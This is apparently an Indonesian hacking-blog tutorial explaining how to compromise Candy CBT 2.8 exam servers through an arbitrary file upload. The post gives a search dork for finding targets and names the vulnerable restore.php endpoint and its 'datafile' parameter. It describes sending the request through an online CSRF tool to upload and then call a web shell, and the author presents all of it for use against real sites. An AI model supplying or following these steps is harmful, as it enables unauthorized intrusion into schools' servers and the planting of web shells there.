Telusuri

Candy Cbt 2.8 AFU (Arbritrary File Upload) With Csrf

Hari | ./EcchiExploit Juni 05, 2020

Hallo Bujannk :v
Jadi Gini, Sebenernya Ane Ke Inget Aja Sih Napa Gak Buat Yang Langsung File Upload Aja Wkwkw

Dan Pas Ane Liat Di Youtube Banyak Yang Buat Content Candy Cbt Add Admin Pas Ane Lihat Ada Yang Up Shell..  Yaudah Deh Ane Cari Bug Nya Biar Langsung Ke Up File Jadi Gak Perlu Add Admin Lagi Atau Add User Lagi..

Langsung Aja Tutornya Kek Gimana...

  • Dork :
© Candy CBT v2.8.0 inurl:login.php
  • Exploit :
admin/restore.php
Postfile : datafile

Jika Bahan Diatas Dah Siap Kita Lakukan Step By Step Di Bawah...
  • Kalian Dorking Dulu Gunakan Dork Yang Ane Siapa Kan Tadi.. 
  • Jika Sudah Dorking Kalian Cari Sitenya Yang Menurut Kalian Vuln Seperti Biasanya Lalu Masukan Exploitnya Seperti Ini
https://candy.com/admin/restore.php
Or
https://candy.com/[patch]/admin/restore.php
  • Jika Vuln Akan Seperti Gambar Di Bawah Gan
  • Nah Terdabat Text : Fatal Error
  • Next Jika Terdabat Text Itu Artinya Vuln Langsung Ke Csrf Online (Kalian Cari Aja Di Google Gan Banyak)
  • Kalian Masukan Sitenya Gan Dan Postfilenya
  • Jika Sudah Kalian Eksekusi Lalu Upload Shell Atau Sc Kalian... 
  • Jika Success Akan Seperti Ini.. 
  • Terdapat Text : Data Berhasil Di Restore
  • Sekarang Kita Panggil Shell Atau Sc Kalian Seperti Ini.. 
https://candy.com/admin/shell-kalian
Or
https://candy.com/[patch]/admin/shell-kalian
  • And Boom

Sekian.. 
Happy Exploit And Happy Hacking.. 
Tags
Hari | ./EcchiExploit

Diposting oleh Hari | ./EcchiExploit

Coding Itu Lebih Menyenangkan Dari Pada Membuat Orang Sengsara

Posting Komentar

2 Komentar

Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)